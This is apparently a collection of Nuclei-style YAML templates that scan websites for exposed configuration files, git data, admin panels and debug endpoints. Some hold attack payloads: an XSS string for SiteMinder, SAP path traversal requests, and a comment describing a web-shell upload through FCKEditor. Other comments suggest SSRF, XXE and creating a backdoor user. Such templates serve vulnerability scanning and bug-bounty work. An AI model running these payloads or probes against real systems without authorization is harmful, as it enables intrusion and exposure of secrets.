├── Actuator.yaml ├── CellPower-Agent.yaml ├── Cloudify-login.yaml ├── DOM-XSS-SiteMinder.yaml ├── Dir-Contents-Disc-logs.yaml ├── FCKEditor-Exposed.yaml ├── File-manager-search.yaml ├── Find-wp-config-backup.yaml ├── Get-Env.yaml ├── Git-search-logs.yaml ├── IBM-Signup-Exposure.yaml ├── Kronos-wsld-exposure.yaml ├── Letter-Opener-Exposed.yaml ├── OpenText-LiveSite-TeamSite-Database-info-Exposure.yaml ├── ProfileService.yaml ├── RedCap-Install-Module.yaml ├── SAP-Path-Traversal.yaml ├── Web-xml-finder.yaml ├── WordPress-Fancy-Product-Designer-IOC.yaml ├── Workfront-dev-backend.yaml ├── adminer.php.yaml ├── dashboard-exposed.yaml ├── elmah-PartnerPortal.yaml ├── find-config.xml copy.yaml ├── find-config.xml.yaml ├── killswitch.yaml ├── phpmyadmin.yaml ├── sam-search.yaml └── siteminderagent.yaml /Actuator.yaml: -------------------------------------------------------------------------------- 1 | id: Finds actuator 2 | info: 3 | name: Actuator info leakage 4 | author: Clark 5 | severity: medium 6 | # Look for exposed info in the responses. 
7 | requests: 8 | - method: GET 9 | path: 10 | - "{{BaseURL}}/actuator" 11 | - "{{BaseURL}}/actuator/caches" 12 | - "{{BaseURL}}/actuator/configprops" 13 | - "{{BaseURL}}/actuator/conditions" 14 | - "{{BaseURL}}/actuator/env" 15 | - "{{BaseURL}}/actuator/beans" 16 | - "{{BaseURL}}/actuator/info" 17 | - "{{BaseURL}}/actuator/scheduledtasks" 18 | - "{{BaseURL}}/actuator/features" 19 | - "{{BaseURL}}/actuator/refresh" 20 | - "{{BaseURL}}/actuator/metrics" 21 | - "{{BaseURL}}/actuator/loggers" 22 | - "{{BaseURL}}/actuator/mappings" 23 | - "{{BaseURL}}/actuator/threaddump" 24 | 25 | matchers-condition: and 26 | matchers: 27 | - type: word 28 | words: 29 | - actuator 30 | condition: and 31 | 32 | - type: status 33 | status: 34 | - 200 35 | -------------------------------------------------------------------------------- /CellPower-Agent.yaml: -------------------------------------------------------------------------------- 1 | id: CellPower Agent backend info exposure 2 | info: 3 | name: CellPower Agent sensitive info exposure 4 | author: Clark 5 | severity: high 6 | requests: 7 | - method: GET 8 | path: 9 | - "{{BaseURL}}/user/ajax" 10 | - "{{BaseURL}}/user/confirm-activation" 11 | - "{{BaseURL}}/user/settings" 12 | - "{{BaseURL}}/user/create-success" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - array 19 | condition: and 20 | 21 | - type: status 22 | status: 23 | - 200 -------------------------------------------------------------------------------- /Cloudify-login.yaml: -------------------------------------------------------------------------------- 1 | id: Cloudify login Exposed (Try default creds) 2 | info: 3 | name: Cloudify login 4 | author: Clark 5 | severity: medium 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - "{{BaseURL}}/console/login" 11 | 12 | matchers-condition: and 13 | matchers: 14 | 15 | - type: word 16 | words: 17 | - "Cloudify Console" 18 | 19 | - type: status 20 | status: 21 | - 200 
-------------------------------------------------------------------------------- /DOM-XSS-SiteMinder.yaml: -------------------------------------------------------------------------------- 1 | id: siteminder-dom-based-xss 2 | 3 | info: 4 | name: SiteMinder DOM BASED XSS 5 | author: Clark 6 | severity: medium 7 | description: SiteMinder DOM Based XSS. 8 | tags: dom,xss 9 | reference: https://blog.reigningshells.com/2019/12/reviving-old-cves-reflected-xss-in-ca.html 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/siteminderagent/forms/smpwservices.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7' 15 | - '{{BaseURL}}/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7' 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: status 20 | status: 21 | - 200 22 | 23 | - type: word 24 | words: 25 | - 'confirm(document.domain)' 26 | 27 | - type: word 28 | words: 29 | - 'text/html' 30 | part: header 31 | -------------------------------------------------------------------------------- /Dir-Contents-Disc-logs.yaml: -------------------------------------------------------------------------------- 1 | id: Directory Content logs 2 | info: 3 | name: Search for log.txt 4 | author: Clark 5 | severity: medium 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - "{{BaseURL}}/log/log.txt" 11 | 12 | matchers-condition: and 13 | matchers: 14 | 15 | - type: word 16 | words: 17 | - log 18 | 19 | - type: status 20 | status: 21 | - 200 22 | 23 | - type: word 24 | words: 25 | - 'text/plain' 26 | part: header 27 | -------------------------------------------------------------------------------- /FCKEditor-Exposed.yaml: -------------------------------------------------------------------------------- 1 | id: FCKEditor Core Exposure 2 | 3 | info: 4 | name: FCKEditor Core 5 | author: Clark 6 | severity: info 7 | 
#create a htaccess file:code: SetHandler application/x-httpd-php 8 | #Now upload shell.php.gif with FCKeditor. After upload shell.php.gif, the name "shell.php.gif" change to "shell_php.gif" automatically, http://target.com/anything/shell_php.gif, Now shell is available from server. 9 | #https://www.exploit-db.com/exploits/17644 10 | #https://www.exploit-db.com/exploits/15484 11 | #https://github.com/BuddhaLabs/PacketStorm-Exploits/blob/master/1003-exploits/fckeditor-shell.txt,Sample Backdoor:(save as "any_name.php3") 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/fckeditor/editor/filemanager/upload/test.html" 16 | - "{{BaseURL}}/fckeditor/editor/filemanager/browser/default/connectors/test.html" 17 | - "{{BaseURL}}/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media" 18 | - "{{BaseURL}}/fckeditor/editor/filemanager/connectors/aspx/upload.aspx" 19 | - "{{BaseURL}}/fckeditor/editor/filemanager/connectors/aspx/connector.aspx" 20 | - "{{BaseURL}}/fckeditor/editor/filemanager/browser/default/js/fckxml.js" 21 | - "{{BaseURL}}/fckeditor/editor/filemanager/browser/default/browser.html?Connector=/editor/filemanager/browser/default/connectors/php/connector.php" 22 | 23 | matchers-condition: and 24 | matchers: 25 | 26 | - type: word 27 | words: 28 | - fckeditor 29 | condition: or 30 | 31 | - type: status 32 | status: 33 | - 200 34 | condition: or -------------------------------------------------------------------------------- /File-manager-search.yaml: -------------------------------------------------------------------------------- 1 | id: FIle Manager exposed 2 | info: 3 | name: Search for FIle Manager 4 | author: Clark 5 | severity: medium 6 | requests: 7 | - method: GET 8 | path: 9 | - "{{BaseURL}}/editor/editor/filemanager/browser/default/js/fckxml.js" 10 | - "{{BaseURL}}/editor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php" 11 | - "{{BaseURL}}/editor/editor/filemanager/connectors/php/upload.php" 12 | - 
"{{BaseURL}}/editor/editor/filemanager/browser/default/browser.html" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "FCKeditor" 19 | - "executing" 20 | condition: and 21 | 22 | - type: status 23 | status: 24 | - 200 25 | 26 | -------------------------------------------------------------------------------- /Find-wp-config-backup.yaml: -------------------------------------------------------------------------------- 1 | id: wp-config backup Exposed 2 | info: 3 | name: Find wp-config backup 4 | author: Clark 5 | severity: medium 6 | requests: 7 | - method: GET 8 | path: 9 | - "{{BaseURL}}/wp-config.php.bak" 10 | 11 | matchers-condition: and 12 | matchers: 13 | - type: word 14 | words: 15 | - dev 16 | condition: and 17 | 18 | - type: status 19 | status: 20 | - 200 21 | -------------------------------------------------------------------------------- /Get-Env.yaml: -------------------------------------------------------------------------------- 1 | id: Env Exposed 2 | info: 3 | name: Find Exposed Env 4 | author: Clark 5 | severity: medium 6 | requests: 7 | - method: GET 8 | path: 9 | - "{{BaseURL}}/.env" 10 | 11 | matchers-condition: and 12 | matchers: 13 | - type: word 14 | words: 15 | - ADMIN_USER 16 | condition: and 17 | 18 | - type: status 19 | status: 20 | - 200 21 | -------------------------------------------------------------------------------- /Git-search-logs.yaml: -------------------------------------------------------------------------------- 1 | id: Git logs found 2 | info: 3 | name: Find Git log exposure 4 | author: Clark 5 | severity: medium 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - "{{BaseURL}}/.git/logs/HEAD" 11 | - "{{BaseURL}}/.git/COMMIT_EDITMSG" 12 | - "{{BaseURL}}/.git/index" 13 | - "{{BaseURL}}/.git/logs/refs/heads/master" 14 | - "{{BaseURL}}/config.php~" 15 | - "{{BaseURL}}/.git/COMMIT_EDITMSG" 16 | - "{{BaseURL}}/.git/config" 17 | - "{{BaseURL}}/.git/FETCH_HEAD" 18 | - 
"{{BaseURL}}/.git/logs/refs/remotes/origin/master" 19 | - "{{BaseURL}}/.git/refs/heads/master" 20 | - "{{BaseURL}}/.git/refs/remotes/origin/master" 21 | - "{{BaseURL}}/log/access.log" 22 | - "{{BaseURL}}/.git/info/exclude" 23 | - "{{BaseURL}}/log/error.log" 24 | - "{{BaseURL}}/log/php_errorlog" 25 | - "{{BaseURL}}/readme.md" 26 | - "{{BaseURL}}/readme.txt" 27 | - "{{BaseURL}}/.git/description" 28 | - "{{BaseURL}}/.gitignore" 29 | - "{{BaseURL}}/.git/refs/tags" 30 | - "{{BaseURL}}/.git/packed-refs" 31 | 32 | matchers-condition: and 33 | matchers: 34 | - type: status 35 | status: 36 | - 200 37 | 38 | - type: word 39 | words: 40 | - 'root' 41 | - 'commint' 42 | - 'git' 43 | - 'COMMIT_EDITMSG' 44 | - 'pack-refs' 45 | - 'gitignore' 46 | 47 | part: body 48 | -------------------------------------------------------------------------------- /IBM-Signup-Exposure.yaml: -------------------------------------------------------------------------------- 1 | id: IBM friendly path exposure 2 | info: 3 | name: Finds friendly path exposed, leads to user sign-up page to create backdoor user. 
4 | author: Clark Voss 5 | severity: medium 6 | reference: https://clarkvoss.medium.com/how-to-harpon-big-blue-c163722638d8 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/wps/portal/client/welcome/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/?uri=nm:oid:Z6_00000000000000A0BR2B300GG2" 13 | - "{{BaseURL}}/wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/?uri=nm:oid:Z6_00000000000000A0BR2B300GG2" 14 | - "{{BaseURL}}/wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBQfxRYSYCHh5mHoYWBj7-RL1DC1y3M2NXCx9jA3RiqAI8ZBbmhEQaZjooABQv7ag!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/#Z7_00000000000000A0BR2B300IO0" 15 | - "{{BaseURL}}/wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBAf0FuaCgAb7VcBA!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/#Z7_00000000000000A0BR2B300IO0" 16 | - "{{BaseURL}}/wps/portal/!ut/p/z1/pZHBDoIwDIYfqZVF4DoIEg5KBEHWi9mBIAnbjCEefHqH8SARJNGe2qRf_78tEFRAWt7aRvat0bKztSD3hKPgGGROwBDjEuH4bOBxWewx9NzUOzBMki3mWRSs_M0a6IN_n_Ti5wRiZ4Kf0J9r8PEXfmTwL_0Sl_YXlvfm-CRFKLS5KvuJHAgoDXeL9wKSBkR_VkPa6QZEra1N-rrJcKglqxdV2KjuEVM-czP-AKyJL-g!/dz/d5/L2dBISEvZ0FBIS9nQSEh/#Z7_00000000000000A0BR2B300IO0" 17 | 18 | 
matchers: 19 | - type: word 20 | words: 21 | - "Edit My Profile" 22 | - "Friendly path" 23 | - "IBM WebSphere Portal" 24 | - "Sign Up" 25 | - "http://www.ibm.com/websphere/developer/zones/portal/" 26 | - "http://www.ibm.com/software/genservers/portal/support/" 27 | 28 | part: body 29 | - type: status 30 | status: 31 | - 200 32 | -------------------------------------------------------------------------------- /Kronos-wsld-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: Kronos wsdl found 2 | info: 3 | name: Find Kronos wsdl exposure (Try XXE) 4 | author: Clark 5 | severity: medium 6 | requests: 7 | - method: GET 8 | path: 9 | - "{{BaseURL}}/wfc/webservice/ReportConfigService?wsdl" 10 | - "{{BaseURL}}/wfc/XmlService" 11 | - "{{BaseURL}}/wfc/" 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "xml-soap" 17 | - "application/xml" 18 | part: body 19 | -------------------------------------------------------------------------------- /Letter-Opener-Exposed.yaml: -------------------------------------------------------------------------------- 1 | id: Letter Opener Web Exposed 2 | info: 3 | name: Finds Letter Opener Web Exposed 4 | author: Clark 5 | severity: medium 6 | requests: 7 | - method: GET 8 | path: 9 | - "{{BaseURL}}/letter_opener/" 10 | 11 | matchers-condition: and 12 | matchers: 13 | - type: word 14 | words: 15 | - letter opener 16 | condition: and 17 | 18 | - type: status 19 | status: 20 | - 200 21 | -------------------------------------------------------------------------------- /OpenText-LiveSite-TeamSite-Database-info-Exposure.yaml: -------------------------------------------------------------------------------- 1 | id: OpenText LiveSites TeamSite database info exposed 2 | 3 | info: 4 | name: OpenText LiveSite TeamSite database info exposed. 5 | author: Clark 6 | severity: medium 7 | description: Can find database connection info. 
8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}//iw-cc//WEB-INF/conf/livesite/resources/resource-config.xml' 13 | - '{{BaseURL}}//iw-cc//WEB-INF/web.xml' 14 | - '{{BaseURL}}//iw-cc//WEB-INF/conf/livesite_customer/database.properties' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | 22 | - type: word 23 | words: 24 | - 'Interwoven Process Model Web View' 25 | - 'database.properties.template' 26 | - 'resource-config.xml' 27 | 28 | - type: word 29 | words: 30 | - 'application/xml' 31 | - 'text/plain' 32 | part: header 33 | -------------------------------------------------------------------------------- /ProfileService.yaml: -------------------------------------------------------------------------------- 1 | id: Find ProfileService 2 | info: 3 | name: Find WSDL Profile Service exposed 4 | author: Clark 5 | severity: medium 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - "{{BaseURL}}/services/profileService" 11 | 12 | matchers-condition: and 13 | matchers: 14 | - type: word 15 | words: 16 | - soapenv 17 | condition: and 18 | 19 | - type: status 20 | status: 21 | - 200 22 | -------------------------------------------------------------------------------- /RedCap-Install-Module.yaml: -------------------------------------------------------------------------------- 1 | id: RedCap Install Mode 2 | 3 | info: 4 | name: RedCap Install Module Exposed (can redirect site) 5 | author: Clark 6 | severity: medium 7 | description: Can redirect site using REDCap base URL. 
8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/install.php' 13 | - '{{BaseURL}}/redcap/install.php' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | 21 | - type: word 22 | words: 23 | - 'Installation Module' 24 | 25 | - type: word 26 | words: 27 | - 'text/html' 28 | part: header -------------------------------------------------------------------------------- /SAP-Path-Traversal.yaml: -------------------------------------------------------------------------------- 1 | id: SAP Path Traversal 2 | 3 | info: 4 | name: SAP Path Traversal 5 | author: Clark 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/scheduler/ui/js/?\&..\\\&..\\\&..\\\version.txt' 12 | - '{{BaseURL}}/scheduler/ui/js/UIUtilJavaScriptJS?\&..\\\&..\\\&..\\\version.txt' 13 | - '{{BaseURL}}/scheduler/ui/js/4c540510/UIUtilJavaScriptJS?\&..\\\&..\\\&..\\\version.txt' 14 | - '{{BaseURL}}/scheduler/ui/js/ffffffffbac53543/UIUtilJavaScriptJS?\&..\\\&..\\\&..\\\version.txt' 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - "Build" 20 | part: body 21 | 22 | - type: word 23 | words: 24 | - 'text/plain' 25 | part: header 26 | -------------------------------------------------------------------------------- /Web-xml-finder.yaml: -------------------------------------------------------------------------------- 1 | id: web.xml Exposed 2 | info: 3 | name: Find web.xml found 4 | author: Clark 5 | severity: medium 6 | requests: 7 | - method: GET 8 | path: 9 | - "{{BaseURL}}/iw-cc/WEB-INF/web.xml" 10 | 11 | matchers-condition: and 12 | matchers: 13 | - type: word 14 | words: 15 | - contextConfigLocation 16 | condition: and 17 | 18 | - type: status 19 | status: 20 | - 200 21 | -------------------------------------------------------------------------------- /WordPress-Fancy-Product-Designer-IOC.yaml: -------------------------------------------------------------------------------- 1 | id: Search for IOC for Fancy 
Product Designer 2 | info: 3 | name: Find Indicators of Compromise for Fancy Product Designer 4 | author: Clark 5 | severity: High 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - "{{BaseURL}}/wp-content/plugins/fancy-product-designer/inc/2021/05/30/4fa00001c720b30102987d980e62d5e4.php" 11 | - "{{BaseURL}}/wp-content/plugins/fancy-product-designer/inc" 12 | - "{{BaseURL}}/wp-admin/2021/05/31/4fa00001c720b30102987d980e62d5e4.php" 13 | - "{{BaseURL}}/wp-admin/2021/05/31/3783701c82396cc96d842839a291e813.php" 14 | - "{{BaseURL}}/wp-admin/2021/05/31/29da9e97d5efe5c9a8680c7066bb2840.php" 15 | 16 | matchers-condition: and 17 | matchers: 18 | 19 | - type: word 20 | words: 21 | - 'php' 22 | - 'class-debug.php' 23 | - 'settings' 24 | 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /Workfront-dev-backend.yaml: -------------------------------------------------------------------------------- 1 | id: Backend Dev WorkFront Exposed 2 | info: 3 | name: Find WorkFront Dev Backend and works for Symfony panel. 
4 | author: Clark 5 | severity: medium 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - '{{BaseURL}}/backend_dev.php/' 11 | - '{{BaseURL}}/backend.php' 12 | 13 | matchers-condition: and 14 | matchers: 15 | 16 | - type: word 17 | words: 18 | - 'backend_dev.php' 19 | 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /adminer.php.yaml: -------------------------------------------------------------------------------- 1 | id: Find adminer dashboard 2 | info: 3 | name: Find adminer dashboard exposed 4 | author: Clark 5 | severity: medium 6 | #Server-side Request Forgery (SSRF) Try adminer.php?server=[payload]&username=123&password=123&db=123 7 | requests: 8 | - method: GET 9 | path: 10 | - "{{BaseURL}}/adminer.php" 11 | 12 | matchers-condition: and 13 | matchers: 14 | - type: word 15 | words: 16 | - Adminer 17 | condition: and 18 | 19 | - type: status 20 | status: 21 | - 200 22 | -------------------------------------------------------------------------------- /dashboard-exposed.yaml: -------------------------------------------------------------------------------- 1 | id: Dashboard Exposed bypassing authentication 2 | info: 3 | name: Find Exposed dashboard 4 | author: Clark 5 | severity: medium 6 | requests: 7 | - method: GET 8 | path: 9 | - "{{BaseURL}}/dashboard" 10 | 11 | matchers-condition: and 12 | matchers: 13 | - type: word 14 | words: 15 | - dashboard 16 | condition: and 17 | 18 | - type: status 19 | status: 20 | - 200 21 | -------------------------------------------------------------------------------- /elmah-PartnerPortal.yaml: -------------------------------------------------------------------------------- 1 | id: elmah.axd found in partnerportal 2 | info: 3 | name: Find partnerportal elmah.axd 4 | author: Clark 5 | severity: medium 6 | requests: 7 | - method: GET 8 | path: 9 | - "{{BaseURL}}/MX/partnerportal/elmah.axd" 10 | 11 | matchers-condition: and 12 | matchers: 13 | - 
type: word 14 | words: 15 | - ELMAH 16 | condition: and 17 | 18 | - type: status 19 | status: 20 | - 200 21 | -------------------------------------------------------------------------------- /find-config.xml copy.yaml: -------------------------------------------------------------------------------- 1 | id: Configuration displayed 2 | info: 3 | name: Finds config for 4 | author: Clark 5 | severity: medium 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - "{{BaseURL}}/CaseManager/welcome/displayCmisConfig.jsp" 11 | 12 | matchers-condition: and 13 | matchers: 14 | 15 | - type: word 16 | words: 17 | - appSettings 18 | 19 | - type: status 20 | status: 21 | - 200 -------------------------------------------------------------------------------- /find-config.xml.yaml: -------------------------------------------------------------------------------- 1 | id: config.xml database info 2 | info: 3 | name: Search for config.xml 4 | author: Clark 5 | severity: medium 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - "{{BaseURL}}/debug/config.xml" 11 | 12 | matchers-condition: and 13 | matchers: 14 | 15 | - type: word 16 | words: 17 | - appSettings 18 | 19 | - type: status 20 | status: 21 | - 200 -------------------------------------------------------------------------------- /killswitch.yaml: -------------------------------------------------------------------------------- 1 | id: Find killswitch dashboard 2 | info: 3 | name: Find killswitch dashboard exposed 4 | author: Clark 5 | severity: medium 6 | #Server-side Request Forgery (SSRF) Try adminer.php?server=[payload]&username=123&password=123&db=123 7 | requests: 8 | - method: GET 9 | path: 10 | - "{{BaseURL}}/killswitch.aspx" 11 | 12 | matchers-condition: and 13 | matchers: 14 | - type: word 15 | words: 16 | - killswitch 17 | condition: and 18 | 19 | - type: status 20 | status: 21 | - 200 22 | -------------------------------------------------------------------------------- /phpmyadmin.yaml: 
-------------------------------------------------------------------------------- 1 | id: Search for phpmyadmin setup page 2 | info: 3 | name: Find exposed phpmyadmin setup page 4 | author: Clark 5 | severity: medium 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - "{{BaseURL}}/phpmyadmin/" 11 | - "{{BaseURL}}/phpmyadmin/index.php" 12 | - "{{BaseURL}}/phpmyadmin/setup" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | words: 19 | - sql 20 | 21 | - type: status 22 | status: 23 | - 200 -------------------------------------------------------------------------------- /sam-search.yaml: -------------------------------------------------------------------------------- 1 | id: saml Exposed 2 | info: 3 | name: Find exposed SimpleSAMLphp frontpage 4 | author: Clark 5 | severity: medium 6 | requests: 7 | - method: GET 8 | path: 9 | - "{{BaseURL}}/saml/module.php/core/frontpage_welcome.php" 10 | 11 | matchers-condition: and 12 | matchers: 13 | - type: word 14 | words: 15 | - SimpleSAMLphp 16 | condition: and 17 | 18 | - type: status 19 | status: 20 | - 200 21 | -------------------------------------------------------------------------------- /siteminderagent.yaml: -------------------------------------------------------------------------------- 1 | id: Siteminderagent exposed 2 | info: 3 | name: Find siteminderagent exposed 4 | author: Clark 5 | severity: medium 6 | # Look for test keys, a backup of login.sfcc, and the smformscgi.cpp source code. 7 | requests: 8 | - method: GET 9 | path: 10 | - "{{BaseURL}}/siteminderagent/" 11 | 12 | matchers-condition: and 13 | matchers: 14 | - type: word 15 | words: 16 | - 'siteminder' 17 | - 'Server Error' 18 | condition: and 19 | 20 | - type: status 21 | status: 22 | - 200 23 | - 500 24 | --------------------------------------------------------------------------------